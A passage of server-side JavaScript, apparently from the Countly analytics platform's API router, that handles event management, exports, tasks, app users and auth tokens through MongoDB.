update_array.omitted_segments = {}; if (event.omitted_segments) { try { update_array.omitted_segments = JSON.parse(JSON.stringify(event.omitted_segments)); } catch (SyntaxError) { update_array.omitted_segments = {}; } } if (params.qstring.omitted_segments && params.qstring.omitted_segments !== "") { try { params.qstring.omitted_segments = JSON.parse(params.qstring.omitted_segments); } catch (SyntaxError) { params.qstring.omitted_segments = {}; console.log('Parse ' + params.qstring.omitted_segments + ' JSON failed', params.req.url, params.req.body); } for (let k in params.qstring.omitted_segments) { update_array.omitted_segments[k] = params.qstring.omitted_segments[k]; update_segments.push({ "key": k, "list": params.qstring.omitted_segments[k] }); pull_us["segments." 
+ k] = {$in: params.qstring.omitted_segments[k]}; } } if (params.qstring.event_map && params.qstring.event_map !== "") { try { params.qstring.event_map = JSON.parse(params.qstring.event_map); } catch (SyntaxError) { params.qstring.event_map = {}; console.log('Parse ' + params.qstring.event_map + ' JSON failed', params.req.url, params.req.body); } if (event.map) { try { update_array.map = JSON.parse(JSON.stringify(event.map)); } catch (SyntaxError) { update_array.map = {}; } } else { update_array.map = {}; } for (let k in params.qstring.event_map) { if (Object.prototype.hasOwnProperty.call(params.qstring.event_map, k)) { update_array.map[k] = params.qstring.event_map[k]; if (update_array.map[k].is_visible && update_array.map[k].is_visible === true) { delete update_array.map[k].is_visible; } if (update_array.map[k].name && update_array.map[k].name === k) { delete update_array.map[k].name; } if (update_array.map[k] && typeof update_array.map[k].is_visible !== 'undefined' && update_array.map[k].is_visible === false) { for (var j = 0; j < update_array.overview.length; j++) { if (update_array.overview[j].eventKey === k) { update_array.overview.splice(j, 1); j = j - 1; } } } if (Object.keys(update_array.map[k]).length === 0) { delete update_array.map[k]; } } } } var changes = {$set: update_array}; if (Object.keys(pull_us).length > 0) { changes = { $set: update_array, $pull: pull_us }; } common.db.collection('events').update({"_id": common.db.ObjectID(params.qstring.app_id)}, changes, function(err2) { if (err2) { common.returnMessage(params, 400, err2); } else { var data_arr = {update: update_array}; data_arr.before = { order: [], map: {}, overview: [], omitted_segments: {} }; if (event.order) { data_arr.before.order = event.order; } if (event.map) { data_arr.before.map = event.map; } if (event.overview) { data_arr.before.overview = event.overview; } if (event.omitted_segments) { data_arr.before.omitted_segments = event.omitted_segments; } //updated, clear out segments Promise.all(update_segments.map(function(obj) { return new Promise(function(resolve) { var collectionNameWoPrefix = common.crypto.createHash('sha1').update(obj.key + params.qstring.app_id).digest('hex'); //removes all document for current segment common.db.collection("events" + collectionNameWoPrefix).remove({"s": {$in: obj.list}}, {multi: true}, function(err3) { if (err3) { console.log(err3); } //create query for all segments var my_query = []; var unsetUs = {}; if (obj.list.length > 0) { for (let p = 0; p < obj.list.length; p++) { my_query[p] = {}; my_query[p]["meta_v2.segments." + obj.list[p]] = {$exists: true}; //for select unsetUs["meta_v2.segments." + obj.list[p]] = ""; //remove from list unsetUs["meta_v2." + obj.list[p]] = ""; } //clears out meta data for segments common.db.collection("events" + collectionNameWoPrefix).update({$or: my_query}, {$unset: unsetUs}, {multi: true}, function(err4) { if (err4) { console.log(err4); } if (plugins.isPluginEnabled('drill')) { //remove from drill var eventHash = common.crypto.createHash('sha1').update(obj.key + params.qstring.app_id).digest('hex'); common.drillDb.collection("drill_meta" + params.qstring.app_id).findOne({_id: "meta_" + eventHash}, function(err5, resEvent) { if (err5) { console.log(err5); } var newsg = {}; var remove_biglists = []; resEvent = resEvent || {}; resEvent.sg = resEvent.sg || {}; for (let p = 0; p < obj.list.length; p++) { if (resEvent.sg[obj.list[p]] && resEvent.sg[obj.list[p]].type === "bl") { remove_biglists.push("meta_" + eventHash + "_sg." 
+ obj.list[p]); } newsg["sg." + obj.list[p]] = {"type": "s"}; } //big list, delete also big list file if (remove_biglists.length > 0) { common.drillDb.collection("drill_meta" + params.qstring.app_id).remove({_id: {$in: remove_biglists}}, function(err6) { if (err6) { console.log(err6); } common.drillDb.collection("drill_meta" + params.qstring.app_id).update({_id: "meta_" + eventHash}, {$set: newsg}, function(err7) { if (err7) { console.log(err7); } resolve(); }); }); } else { common.drillDb.collection("drill_meta" + params.qstring.app_id).update({_id: "meta_" + eventHash}, {$set: newsg}, function() { resolve(); }); } }); } else { resolve(); } }); } else { resolve(); } }); }); })).then(function() { common.returnMessage(params, 200, 'Success'); plugins.dispatch("/systemlogs", { params: params, action: "events_updated", data: data_arr }); }) .catch((error) => { console.log(error); common.returnMessage(params, 400, 'Events were updated successfully. There was an error while clearing segment data. Please check the log for more information'); }); } }); }); }); break; } case 'delete_events': { validateDelete(params, 'events', function() { var idss = []; try { idss = JSON.parse(params.qstring.events); } catch (SyntaxError) { idss = []; } if (!Array.isArray(idss)) { idss = []; } var app_id = params.qstring.app_id; var updateThese = {"$unset": {}}; if (idss.length > 0) { for (let i = 0; i < idss.length; i++) { if (idss[i].indexOf('.') !== -1) { updateThese.$unset["map." + idss[i].replace(/\./g, '\\u002e')] = 1; updateThese.$unset["omitted_segments." + idss[i].replace(/\./g, '\\u002e')] = 1; } else { updateThese.$unset["map." + idss[i]] = 1; updateThese.$unset["omitted_segments." + idss[i]] = 1; } idss[i] = common.decode_html(idss[i]);//previously escaped, get unescaped id (because segments are using it) if (idss[i].indexOf('.') !== -1) { updateThese.$unset["segments." + idss[i].replace(/\./g, '\\u002e')] = 1; } else { updateThese.$unset["segments." + idss[i]] = 1; } }
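//load the events document so overview, list and order references to the deleted event keys can be cleaned up along with the $unset update below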
common.db.collection('events').findOne({"_id": common.db.ObjectID(params.qstring.app_id)}, function(err, event) { if (err) { common.returnMessage(params, 400, err); return; } if (!event) { common.returnMessage(params, 400, "Could not find event"); return; } //fix overview if (event.overview && event.overview.length) { for (let i = 0; i < idss.length; i++) { for (let j = 0; j < event.overview.length; j++) { if (event.overview[j].eventKey === idss[i]) { event.overview.splice(j, 1); j = j - 1; } } } if (!updateThese.$set) { updateThese.$set = {}; } updateThese.$set.overview = event.overview; } //remove from list if (typeof event.list !== 'undefined' && Array.isArray(event.list) && event.list.length > 0) { for (let i = 0; i < idss.length; i++) { let index = event.list.indexOf(idss[i]); if (index > -1) { event.list.splice(index, 1); i = i - 1; } } if (!updateThese.$set) { updateThese.$set = {}; } updateThese.$set.list = event.list; } //remove from order if (typeof event.order !== 'undefined' && Array.isArray(event.order) && event.order.length > 0) { for (let i = 0; i < idss.length; i++) { let index = event.order.indexOf(idss[i]); if (index > -1) { event.order.splice(index, 1); i = i - 1; } } if (!updateThese.$set) { updateThese.$set = {}; } updateThese.$set.order = event.order; } common.db.collection('events').update({"_id": common.db.ObjectID(app_id)}, updateThese, function(err2) { if (err2) { console.log(err2); common.returnMessage(params, 400, err2); } else { for (let i = 0; i < idss.length; i++) { var collectionNameWoPrefix = common.crypto.createHash('sha1').update(idss[i] + app_id).digest('hex'); common.db.collection("events" + collectionNameWoPrefix).drop(function() {}); plugins.dispatch("/i/event/delete", { event_key: idss[i], appId: app_id }); } plugins.dispatch("/systemlogs", { params: params, action: "event_deleted", data: { events: idss, appID: app_id } }); common.returnMessage(params, 200, 'Success'); } }); }); } else { common.returnMessage(params, 400, "Missing events to delete"); } }); break; } case 'change_visibility': { validateUpdate(params, 'events', function() { common.db.collection('events').findOne({"_id": common.db.ObjectID(params.qstring.app_id)}, function(err, event) { if (err) { common.returnMessage(params, 400, err); return; } if (!event) { common.returnMessage(params, 400, "Could not find event"); return; } var update_array = {}; var idss = []; try { idss = JSON.parse(params.qstring.events); } catch (SyntaxError) { idss = []; } if (!Array.isArray(idss)) { idss = []; } if (event.map) { try { update_array.map = JSON.parse(JSON.stringify(event.map)); } catch (SyntaxError) { update_array.map = {}; console.log('Parse ' + event.map + ' JSON failed', params.req.url, params.req.body); } } else { update_array.map = {}; } for (let i = 0; i < idss.length; i++) { var baseID = idss[i].replace(/\\u002e/g, "."); if (!update_array.map[idss[i]]) { update_array.map[idss[i]] = {}; } if (params.qstring.set_visibility === 'hide') { update_array.map[idss[i]].is_visible = false; } else { update_array.map[idss[i]].is_visible = true; } if (update_array.map[idss[i]].is_visible) { delete update_array.map[idss[i]].is_visible; } if (Object.keys(update_array.map[idss[i]]).length === 0) { delete update_array.map[idss[i]]; } if (params.qstring.set_visibility === 'hide' && event && event.overview && Array.isArray(event.overview)) { for (let j = 0; j < event.overview.length; j++) { if (event.overview[j].eventKey === baseID) { event.overview.splice(j, 1); j = j - 1; } } update_array.overview 
= event.overview; } } common.db.collection('events').update({"_id": common.db.ObjectID(params.qstring.app_id)}, {'$set': update_array}, function(err2) { if (err2) { common.returnMessage(params, 400, err2); } else { common.returnMessage(params, 200, 'Success'); var data_arr = {update: update_array}; data_arr.before = {map: {}}; if (event.map) { data_arr.before.map = event.map; } plugins.dispatch("/systemlogs", { params: params, action: "events_updated", data: data_arr }); } }); }); }); break; } default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all or /me'); } break; } break; } case '/i': { params.ip_address = params.qstring.ip_address || common.getIpAddress(params.req); params.user = {}; if (!params.qstring.app_key || !params.qstring.device_id) { common.returnMessage(params, 400, 'Missing parameter "app_key" or "device_id"'); return false; } else { //make sure device_id is string params.qstring.device_id += ""; params.qstring.app_key += ""; // Set app_user_id that is unique for each user of an application. params.app_user_id = common.crypto.createHash('sha1') .update(params.qstring.app_key + params.qstring.device_id + "") .digest('hex'); } if (params.qstring.events && typeof params.qstring.events === "string") { try { params.qstring.events = JSON.parse(params.qstring.events); } catch (SyntaxError) { console.log('Parse events JSON failed', params.qstring.events, params.req.url, params.req.body); } } log.d('processing request %j', params.qstring); params.promises = []; validateAppForWriteAPI(params, () => { /** * Dispatches /sdk/end event upon finishing processing request **/ function resolver() { plugins.dispatch("/sdk/end", {params: params}); } Promise.all(params.promises) .then(resolver) .catch((error) => { console.log(error); resolver(); }); }); break; } case '/o/users': { switch (paths[3]) { case 'all': validateRead(params, 'global_users', countlyApi.mgmt.users.getAllUsers); break; case 'me': validateUserForMgmtReadAPI(countlyApi.mgmt.users.getCurrentUser, params); break; case 'id': validateRead(params, 'global_users', countlyApi.mgmt.users.getUserById); break; case 'reset_timeban': validateUpdate(params, 'global_users', countlyApi.mgmt.users.resetTimeBan); break; case 'permissions': validateRead(params, 'core', function() { var features = ["core", "events", "global_configurations", "global_applications", "global_users", "global_jobs"]; plugins.dispatch("/permissions/features", {params: params, features: features}, function() { common.returnOutput(params, features); }); }); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all or /me'); } break; } break; } case '/o/app_users': { switch (paths[3]) { case 'loyalty': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } validateUserForMgmtReadAPI(countlyApi.mgmt.appUsers.loyalty, params); break; } case 'download': { if (paths[4] && paths[4] !== '') { 
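//stream a previously generated app user export archive (.tar.gz) from GridFS back to the requester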
validateUserForRead(params, function() { var filename = paths[4].split('.'); var myfile = '../../export/AppUser/' + filename[0] + '.tar.gz'; countlyFs.gridfs.getSize("appUsers", myfile, {id: filename[0] + '.tar.gz'}, function(error, size) { if (error) { common.returnMessage(params, 400, error); } else if (parseInt(size) === 0) { common.returnMessage(params, 400, "Export doesn't exist"); } else { countlyFs.gridfs.getStream("appUsers", myfile, {id: filename[0] + '.tar.gz'}, function(err, stream) { if (err) { common.returnMessage(params, 400, "Export doesn't exist"); } else { params.res.writeHead(200, { 'Content-Type': 'application/x-gzip', 'Content-Length': size, 'Content-Disposition': 'inline; filename="' + filename[0] + '.tar.gz"' }); stream.pipe(params.res); } }); } }); }); } else { common.returnMessage(params, 400, 'Missing filename'); } break; } default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all or /me'); } break; } break; } case '/o/apps': { switch (paths[3]) { case 'all': validateRead(params, 'global_applications', countlyApi.mgmt.apps.getAllApps); break; case 'mine': validateUser(params, countlyApi.mgmt.apps.getCurrentUserApps); break; case 'details': validateRead(params, 'global_applications', countlyApi.mgmt.apps.getAppsDetails); break; case 'plugins': validateRead(params, 'global_applications', countlyApi.mgmt.apps.getAppPlugins); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /all, /mine, /details or /plugins'); } break; } break; } case '/o/tasks': { switch (paths[3]) { case 'all': validateRead(params, 'core', () => { if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { params.qstring.query = {}; } } if (params.qstring.query.$or) { params.qstring.query.$and = [ {"$or": Object.assign([], params.qstring.query.$or) }, {"$or": [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]} ]; delete params.qstring.query.$or; } else { params.qstring.query.$or = [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]; } params.qstring.query.subtask = {$exists: false}; params.qstring.query.app_id = params.qstring.app_id; if (params.qstring.app_ids && params.qstring.app_ids !== "") { var ll = params.qstring.app_ids.split(","); if (ll.length > 1) { params.qstring.query.app_id = {$in: ll}; } } if (params.qstring.period) { countlyCommon.getPeriodObj(params); params.qstring.query.ts = countlyCommon.getTimestampRangeQuery(params, false); } taskmanager.getResults({ db: common.db, query: params.qstring.query }, (err, res) => { common.returnOutput(params, res || []); }); }); break; case 'count': validateRead(params, 'core', () => { if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { params.qstring.query = {}; } } if (params.qstring.query.$or) { params.qstring.query.$and = [ {"$or": Object.assign([], 
params.qstring.query.$or) }, {"$or": [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]} ]; delete params.qstring.query.$or; } else { params.qstring.query.$or = [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]; } if (params.qstring.period) { countlyCommon.getPeriodObj(params); params.qstring.query.ts = countlyCommon.getTimestampRangeQuery(params, false); } taskmanager.getCounts({ db: common.db, query: params.qstring.query }, (err, res) => { common.returnOutput(params, res || []); }); }); break; case 'list': validateRead(params, 'core', () => { if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query); } catch (ex) { params.qstring.query = {}; } } if (params.qstring.query.$or) { params.qstring.query.$and = [ {"$or": Object.assign([], params.qstring.query.$or) }, {"$or": [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]} ]; delete params.qstring.query.$or; } else { params.qstring.query.$or = [{"global": {"$ne": false}}, {"creator": params.member._id + ""}]; } params.qstring.query.subtask = {$exists: false}; params.qstring.query.app_id = params.qstring.app_id; if (params.qstring.period) { countlyCommon.getPeriodObj(params); params.qstring.query.ts = countlyCommon.getTimestampRangeQuery(params, false); } const skip = params.qstring.iDisplayStart; const limit = params.qstring.iDisplayLength; const sEcho = params.qstring.sEcho; const keyword = params.qstring.sSearch || null; const sortBy = params.qstring.iSortCol_0 || null; const sortSeq = params.qstring.sSortDir_0 || null; taskmanager.getTableQueryResult({ db: common.db, query: params.qstring.query, page: {skip, limit}, sort: {sortBy, sortSeq}, keyword: keyword, }, (err, res) => { if (!err) { common.returnOutput(params, {aaData: res.list, iTotalDisplayRecords: res.count, iTotalRecords: res.count, sEcho}); } else { common.returnMessage(params, 500, '"Query failed"'); } }); }); break; case 'task': validateRead(params, 'core', () => { if (!params.qstring.task_id) { common.returnMessage(params, 400, 'Missing parameter "task_id"'); return false; } taskmanager.getResult({ db: common.db, id: params.qstring.task_id, subtask_key: params.qstring.subtask_key }, (err, res) => { if (res) { common.returnOutput(params, res); } else { common.returnMessage(params, 400, 'Task does not exist'); } }); }); break; case 'check': validateRead(params, 'core', () => { if (!params.qstring.task_id) { common.returnMessage(params, 400, 'Missing parameter "task_id"'); return false; } taskmanager.checkResult({ db: common.db, id: params.qstring.task_id }, (err, res) => { if (res) { common.returnMessage(params, 200, res.status); } else { common.returnMessage(params, 400, 'Task does not exist'); } }); }); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } break; } break; } case '/o/system': { switch (paths[3]) { case 'version': validateUserForMgmtReadAPI(() => { common.returnOutput(params, {"version": versionInfo.version}); }, params); break; case 'plugins': validateUserForMgmtReadAPI(() => { common.returnOutput(params, plugins.getPlugins()); }, params); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, 
validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } break; } break; } case '/o/export': { switch (paths[3]) { case 'db': validateUserForMgmtReadAPI(() => { if (!params.qstring.collection) { common.returnMessage(params, 400, 'Missing parameter "collection"'); return false; } if (typeof params.qstring.query === "string") { try { params.qstring.query = JSON.parse(params.qstring.query, common.reviver); } catch (ex) { params.qstring.query = null; } } if (typeof params.qstring.filter === "string") { try { params.qstring.query = JSON.parse(params.qstring.filter, common.reviver); } catch (ex) { params.qstring.query = null; } } if (typeof params.qstring.projection === "string") { try { params.qstring.projection = JSON.parse(params.qstring.projection); } catch (ex) { params.qstring.projection = null; } } if (typeof params.qstring.project === "string") { try { params.qstring.projection = JSON.parse(params.qstring.project); } catch (ex) { params.qstring.projection = null; } } if (typeof params.qstring.sort === "string") { try { params.qstring.sort = JSON.parse(params.qstring.sort); } catch (ex) { params.qstring.sort = null; } } if (typeof params.qstring.formatFields === "string") { try { params.qstring.formatFields = JSON.parse(params.qstring.formatFields); } catch (ex) { params.qstring.formatFields = null; } } dbUserHasAccessToCollection(params, params.qstring.collection, (hasAccess) => { if (hasAccess) { countlyApi.data.exports.fromDatabase({ db: (params.qstring.db === "countly_drill") ? common.drillDb : (params.qstring.dbs === "countly_drill") ? common.drillDb : common.db, params: params, collection: params.qstring.collection, query: params.qstring.query, projection: params.qstring.projection, sort: params.qstring.sort, limit: params.qstring.limit, skip: params.qstring.skip, type: params.qstring.type, filename: params.qstring.filename }); } else { common.returnMessage(params, 401, 'User does not have access right for this collection'); } }); }, params); break; case 'request': validateUserForMgmtReadAPI(() => { if (!params.qstring.path) { common.returnMessage(params, 400, 'Missing parameter "path"'); return false; } if (typeof params.qstring.data === "string") { try { params.qstring.data = JSON.parse(params.qstring.data); } catch (ex) { console.log("Error parsing export request data", params.qstring.data, ex); params.qstring.data = {}; } } countlyApi.data.exports.fromRequest({ params: params, path: params.qstring.path, data: params.qstring.data, method: params.qstring.method, prop: params.qstring.prop, type: params.qstring.type, filename: params.qstring.filename }); }, params); break; case 'requestQuery': validateUserForMgmtReadAPI(() => { if (!params.qstring.path) { common.returnMessage(params, 400, 'Missing parameter "path"'); return false; } if (typeof params.qstring.data === "string") { try { params.qstring.data = JSON.parse(params.qstring.data); } catch (ex) { console.log("Error parsing export request data", params.qstring.data, ex); params.qstring.data = {}; } } var my_name = JSON.stringify(params.qstring); var ff = taskmanager.longtask({ db: common.db, threshold: plugins.getConfig("api").request_threshold, force: true, gridfs: true, binary: true, app_id: params.qstring.app_id, params: params, type: "tableExport", report_name: params.qstring.filename + "." 
+ params.qstring.type, meta: JSON.stringify({ "app_id": params.qstring.app_id, "query": params.qstring.query || {} }), name: my_name, view: "#/exportedData/tableExport/", processData: function(err, res, callback) { if (!err) { callback(null, res); } else { callback(err, ''); } }, outputData: function(err, data) { if (err) { common.returnMessage(params, 400, err); } else { common.returnMessage(params, 200, data); } } }); countlyApi.data.exports.fromRequestQuery({ params: params, path: params.qstring.path, data: params.qstring.data, method: params.qstring.method, prop: params.qstring.prop, type: params.qstring.type, filename: params.qstring.filename + "." + params.qstring.type, output: function(data) { ff(null, data); } }); }, params); break; case 'download': { if (paths[4] && paths[4] !== '') { common.db.collection("long_tasks").findOne({_id: paths[4]}, function(err, data) { var filename = data.report_name; var type = filename.split("."); type = type[type.length - 1]; var myfile = paths[4]; countlyFs.gridfs.getSize("task_results", myfile, {id: paths[4]}, function(error, size) { if (error) { common.returnMessage(params, 400, error); } else if (parseInt(size) === 0) { common.returnMessage(params, 400, "Export size is 0"); } else { countlyFs.gridfs.getStream("task_results", myfile, {id: paths[4]}, function(err5, stream) { if (err5) { common.returnMessage(params, 400, "Export strem does not exist"); } else { var headers = {}; headers["Content-Type"] = countlyApi.data.exports.getType(type); headers["Content-Disposition"] = "attachment;filename=" + encodeURIComponent(filename); params.res.writeHead(200, headers); stream.pipe(params.res); } }); } }); }); } else { common.returnMessage(params, 400, 'Missing filename'); } break; } case 'data': validateUserForMgmtReadAPI(() => { if (!params.qstring.data) { common.returnMessage(params, 400, 'Missing parameter "data"'); return false; } if (typeof params.qstring.data === "string" && !params.qstring.raw) { try { params.qstring.data = JSON.parse(params.qstring.data); } catch (ex) { common.returnMessage(params, 400, 'Incorrect parameter "data"'); return false; } } countlyApi.data.exports.fromData(params.qstring.data, { params: params, type: params.qstring.type, filename: params.qstring.filename }); }, params); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path'); } break; } break; } case '/o/ping': { common.db.collection("plugins").findOne({_id: "plugins"}, {_id: 1}, (err) => { if (err) { return common.returnMessage(params, 404, 'DB Error'); } else { return common.returnMessage(params, 200, 'Success'); } }); break; } case '/i/token': { switch (paths[3]) { case 'delete': validateUser(() => { if (params.qstring.tokenid) { common.db.collection("auth_tokens").remove({ "_id": params.qstring.tokenid, "owner": params.member._id + "" }, function(err, res) { if (err) { common.returnMessage(params, 404, err.message); } else { common.returnMessage(params, 200, res); } }); } else { common.returnMessage(params, 404, "Token id not provided"); } }, params); break; case 'create': validateUser(params, () => { let ttl, multi, endpoint, purpose, apps; if (params.qstring.ttl) { ttl = parseInt(params.qstring.ttl); } else { ttl = 1800; } multi = true; if (params.qstring.multi 
=== false || params.qstring.multi === 'false') { multi = false; } apps = params.qstring.apps || ""; if (params.qstring.apps) { apps = params.qstring.apps.split(','); } if (params.qstring.endpointquery && params.qstring.endpointquery !== "") { try { endpoint = JSON.parse(params.qstring.endpointquery); //structure with also info for qstring params. } catch (ex) { if (params.qstring.endpoint) { endpoint = params.qstring.endpoint.split(','); } else { endpoint = ""; } } } else if (params.qstring.endpoint) { endpoint = params.qstring.endpoint.split(','); } if (params.qstring.purpose) { purpose = params.qstring.purpose; } authorize.save({ db: common.db, ttl: ttl, multi: multi, owner: params.member._id + "", app: apps, endpoint: endpoint, purpose: purpose, callback: (err, token) => { if (err) { common.returnMessage(params, 404, err); } else { common.returnMessage(params, 200, token); } } }); }); break; default: common.returnMessage(params, 400, 'Invalid path, must be one of /delete or /create'); } break; } case '/o/token': { //returns all my tokens switch (paths[3]) { case 'check': if (!params.qstring.token) { common.returnMessage(params, 400, 'Missing parameter "token"'); return false; } validateUser(params, function() { authorize.check_if_expired({ token: params.qstring.token, db: common.db, callback: (err, valid, time_left)=>{ if (err) { common.returnMessage(params, 404, err.message); } else { common.returnMessage(params, 200, { valid: valid, time: time_left }); } } }); }); break; case 'list': validateUser(params, function() { common.db.collection("auth_tokens").find({"owner": params.member._id + ""}).toArray(function(err, res) { if (err) { common.returnMessage(params, 404, err.message); } else { common.returnMessage(params, 200, res); } }); }); break; default: common.returnMessage(params, 400, 'Invalid path, must be one of /list'); } break; } case '/o': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } switch (params.qstring.method) { case 'jobs': validateRead(params, "global_jobs", countlyApi.data.fetch.fetchJobs('jobs', params)); break; case 'total_users': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTotalUsersObj, params.qstring.metric || 'users'); break; case 'get_period_obj': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.getPeriodObj, 'users'); break; case 'locations': case 'sessions': case 'users': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTimeObj, 'users'); break; case 'app_versions': case 'device_details': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTimeObj, 'device_details'); break; case 'devices': case 'carriers': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTimeObj, params.qstring.method); break; case 'cities': if (plugins.getConfig("api", params.app && params.app.plugins, true).city_data !== false) { validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTimeObj, params.qstring.method); } else { common.returnOutput(params, {}); } break; case 'geodata': { validateRead(params, 'core', function() { if (params.qstring.loadFor === "cities") { countlyApi.data.geoData.loadCityCoordiantes({"query": params.qstring.query}, function(err, data) { common.returnOutput(params, data); }); } }); break; } case 'get_event_groups': validateRead(params, 'core', countlyApi.data.fetch.fetchEventGroups); break; case 'get_event_group': validateRead(params, 'core', countlyApi.data.fetch.fetchEventGroupById); 
break; case 'events': if (params.qstring.events) { try { params.qstring.events = JSON.parse(params.qstring.events); } catch (SyntaxError) { console.log('Parse events array failed', params.qstring.events, params.req.url, params.req.body); } if (params.qstring.overview) { // TODO: handle here, what permission should be required for here? countlyApi.data.fetch.fetchDataEventsOverview(params); } else { // TODO: handle here what permission should be required for here? validateRead(params, 'core', countlyApi.data.fetch.fetchMergedEventData); } } else { if (params.qstring.event && params.qstring.event.startsWith('[CLY]_group_')) { validateRead(params, 'core', countlyApi.data.fetch.fetchMergedEventGroups, params.qstring.method); } else { params.truncateEventValuesList = true; validateRead(params, 'core', countlyApi.data.fetch.prefetchEventData, params.qstring.method); } } break; case 'get_events': validateRead(params, 'core', countlyApi.data.fetch.fetchCollection, 'events'); break; case 'top_events': validateRead(params, 'core', countlyApi.data.fetch.fetchDataTopEvents); break; case 'all_apps': validateRead(params, 'global_applications', countlyApi.data.fetch.fetchAllApps); break; case 'notes': validateRead(params, 'core', countlyApi.mgmt.users.fetchNotes); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid method'); } break; } break; } case '/o/analytics': { if (!params.qstring.app_id) { common.returnMessage(params, 400, 'Missing parameter "app_id"'); return false; } switch (paths[3]) { case 'dashboard': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchDashboard); break; case 'countries': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchCountries); break; case 'sessions': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchSessions); break; case 'metric': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchMetric); break; case 'tops': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchTops); break; case 'loyalty': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchLoyalty); break; case 'frequency': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchFrequency); break; case 'durations': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchDurations); break; case 'events': validateUserForDataReadAPI(params, 'core', countlyApi.data.fetch.fetchEvents); break; default: if (!plugins.dispatch(apiPath, { params: params, validateUserForDataReadAPI: validateUserForDataReadAPI, validateUserForMgmtReadAPI: validateUserForMgmtReadAPI, paths: paths, validateUserForDataWriteAPI: validateUserForDataWriteAPI, validateUserForGlobalAdmin: validateUserForGlobalAdmin })) { common.returnMessage(params, 400, 'Invalid path, must be one of /dashboard or /countries'); } break; } break; } case '/o/countly_version': { validateUser(params, () => { //load previos version info if exist loadFsVersionMarks(function(errFs, fsValues) { loadDbVersionMarks(function(errDb, dbValues) { var response = {}; if (errFs) { response.fs = errFs; } else { response.fs = fsValues; } if (errDb) { response.db = errDb; } else { response.db = dbValues; } response.pkg = packageJson.version || ""; var statusCode = (errFs 
